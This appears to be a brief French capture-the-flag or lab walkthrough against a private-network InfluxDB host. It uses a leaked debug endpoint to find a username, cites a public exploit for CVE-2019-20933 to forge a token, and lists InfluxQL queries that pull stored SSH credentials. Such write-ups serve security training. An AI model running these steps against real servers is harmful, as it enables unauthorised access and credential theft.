Il y a un bug dans InfluxDB et nous pouvons trouver le nom d’un usager en visitant le URL
http://10.10.169.83:8086/debug/requests
Nous pouvons utiliser le script https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 pour nous créer un token et accéder à la base de données
show databases
show tag keys on creds #creds est le nom d'une base de données
show tag values on creds with key = "user"
select * from ssh
use tanks
show field keys on tanks
show measurements
select * from water_tank